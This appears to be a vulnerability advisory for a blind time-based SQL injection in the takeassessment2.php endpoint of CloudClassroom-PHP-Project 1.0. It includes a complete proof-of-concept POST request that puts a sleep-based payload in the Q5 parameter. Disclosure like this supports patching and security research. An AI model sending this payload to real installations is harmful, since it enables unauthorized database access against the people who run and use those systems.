SQL InjectionA SQL Injection vulnerability exists in the takeassessment2.php
endpoint of the CloudClassroom-PHP-Project 1.0, where the Q5 POST
parameter is directly embedded in SQL statements without sanitization.
------------------------------------------
Vulnerability Type :
SQL Injection
------------------------------------------
Vendor of Product :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
------------------------------------------
Affected Product Code Base :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
------------------------------------------
Affected Component :
takeassessment2.php, Q5 POST parameter, SQL query logic
------------------------------------------
Attack Type :
Remote
------------------------------------------
Attack Vectors :
To exploit this vulnerability, an attacker submits a malicious POST request to /CloudClassroom-PHP-Project-master/takeassessment2.php with a payload in the Q5 parameter that causes a time delay in SQL processing (blind time-based SQLi).
POST Request:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done=
This causes a 6-second delay in the response, confirming the vulnerability.
------------------------------------------
Reference :
https://owasp.org/www-community/attacks/SQL_Injection
------------------------------------------
Discoverer :
saurabh solanki
Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/
Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view